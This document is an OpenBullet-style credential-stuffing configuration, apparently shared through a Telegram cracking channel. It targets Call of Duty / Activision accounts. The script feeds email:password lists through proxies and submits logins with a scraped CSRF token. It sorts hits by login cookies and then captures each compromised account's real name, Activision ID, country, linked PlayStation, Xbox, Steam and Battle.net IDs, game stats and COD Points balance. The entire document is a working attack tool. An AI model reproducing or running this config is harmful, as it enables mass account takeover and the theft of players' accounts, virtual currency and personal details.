[SETTINGS]
{
  "Name": "Call Of Duty",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-01-12T00:11:30.7537552+03:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Full Capture | CPM Rate: 200-2000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#G REQUEST GET "https://profile.callofduty.com/cod/login" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 
  HEADER "Accept-Language: en-gb" 
  HEADER "Referer: https://www.google.co.uk/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#cs PARSE "<SOURCE>" LR "<meta name=\"_csrf\" content=\"" "\"/>" -> VAR "cs" 

#P REQUEST POST "https://profile.callofduty.com/do_login?new_SiteId=cod" AutoRedirect=FALSE 
  CONTENT "username=<USER>&remember_me=true&password=<PASS>&_csrf=<cs>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://profile.callofduty.com" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 
  HEADER "Referer: https://profile.callofduty.com/cod/login" 
  HEADER "Accept-Language: en-gb" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<COOKIES(*)>" Contains "LOGIN_FAILURE" 
    KEY "<COOKIES{*}>" Contains "LOGIN_FAILURE" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(*)>" Contains "atkn" 
    KEY "<COOKIES{*}>" Contains "atkn" 
  KEYCHAIN Ban OR 
    KEY "Captcha error. Please try again.</" 

#GG REQUEST GET "https://my.callofduty.com/api/papi-client/crm/cod/v2/identities/<COOKIES(ACT_SSO_COOKIE)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Games PARSE "<SOURCE>" JSON "title" Recursive=TRUE CreateEmpty=FALSE -> CAP "Games" 

#Platform PARSE "<SOURCE>" JSON "platform" Recursive=TRUE CreateEmpty=FALSE -> CAP "Platform" 

#plat PARSE "<SOURCE>" JSON "platform" -> VAR "plat" 

#plat1 PARSE "<SOURCE>" LR "title\":\"mw\",\"platform\":\"" "\"" -> VAR "plat1" 

#user1 PARSE "<SOURCE>" JSON "username" -> VAR "user1" 

#user FUNCTION URLEncode "<user1>" -> VAR "user" 

#Profile REQUEST GET "https://profile.callofduty.com/cod/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Name PARSE "<SOURCE>" LR "<p class=\"personalInfoDisplay\">" "</p>" -> CAP "Name" 

#Activision_ID PARSE "<SOURCE>" LR "<input id=\"forum-name\" name=\"userName\" rel=\"div.tooltip-fname\" type=\"text\" value=\"" "\"/>" CreateEmpty=FALSE -> CAP "Activision ID" 

#ProfileCompletion PARSE "<SOURCE>" LR "<span class=\"percentage\" data-percentage=\"" "\"" -> CAP "Profile Completion" "" "%" 

#Country1 PARSE "<SOURCE>" LR "<span class=\"country\">" "</span>" -> VAR "Country1" 

FUNCTION Replace "<span class=\"country\">" "" "<Country1>" -> CAP "Country" 

#PSN PARSE "<SOURCE>" LR "Playstation Account: " "</span>" CreateEmpty=FALSE -> CAP "PSN LINKED: YES  ID: " 

#BLLIZARD PARSE "<SOURCE>" LR "Battle.net Account: " "</span" CreateEmpty=FALSE -> CAP "BLLIZARD LINKED: YES  ID: " 

#XBOX PARSE "<SOURCE>" LR "XBOX Live Account: " "</span" CreateEmpty=FALSE -> CAP "XBOX LINKED: YES  ID: " 

#STEAM PARSE "<SOURCE>" LR "Steam Account: " "</span" CreateEmpty=FALSE -> CAP "STEAM LINKED: YES  ID: " 

#Info REQUEST GET "https://my.callofduty.com/player/battlepass" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#kills PARSE "<SOURCE>" LR "kills:" "," -> CAP "Kills" 

#startRank PARSE "<SOURCE>" LR "startRank:" "," -> CAP "Start Rank" 

#timePlayedAlive PARSE "<SOURCE>" LR "timePlayedAlive:" "," -> CAP "Time Played Alive" 

#totalXp PARSE "<SOURCE>" LR "totalXp:" "," -> CAP "Total Xp" 

#wins PARSE "<SOURCE>" LR "wins:" "," -> CAP "Wins" 

REQUEST GET "https://my.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform/<plat>/gamer/<user>/profile/type/wz" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Level" 

REQUEST GET "https://my.callofduty.com/player/combatrecord" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Last_Week PARSE "<SOURCE>" LR "kdRatio:" "," -> CAP "Last Week" 

#CP REQUEST GET "https://my.callofduty.com/api/papi-client/inventory/v1/title/mw/platform/<plat1>/gamer/<user>/currency" 
  
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Host: my.callofduty.com" 
  HEADER "Referer: https://my.callofduty.com/fr/dashboard" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edg/86.0.622.51" 

#CP PARSE "<SOURCE>" LR "\"codPoints\":" "}" CreateEmpty=FALSE -> CAP "CP [COD Points]" 

